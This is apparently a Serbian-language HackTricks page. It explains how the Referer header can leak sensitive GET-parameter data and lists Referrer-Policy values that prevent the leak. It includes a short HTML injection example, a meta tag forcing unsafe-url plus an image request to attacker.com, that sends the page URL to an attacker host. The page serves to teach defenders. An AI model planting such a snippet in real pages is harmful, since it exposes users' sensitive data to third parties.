2.4 KiB
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJEM!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Referrer zaglavlja i politika
Referrer je zaglavlje koje koriste pregledači da bi pokazali koja je bila prethodna posjećena stranica.
Procurene osetljive informacije
Ako se u nekom trenutku unutar web stranice nalaze osetljive informacije u GET zahtevu, ako stranica sadrži linkove ka spoljnim izvorima ili napadač može da navede (socijalno inženjering) korisnika da poseti URL koji kontroliše napadač. Mogao bi da eksfiltrira osetljive informacije unutar poslednjeg GET zahteva.
Otklanjanje
Možete naterati pregledač da prati Referrer-policy koji bi mogao izbeći slanje osetljivih informacija drugim web aplikacijama:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Protivmere
Možete poništiti ovaj pravilo korišćenjem HTML meta oznake (napadač mora iskoristiti HTML ubacivanje):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Odbrana
Nikada nemojte stavljati bilo kakve osetljive podatke unutar GET parametara ili putanja u URL-u.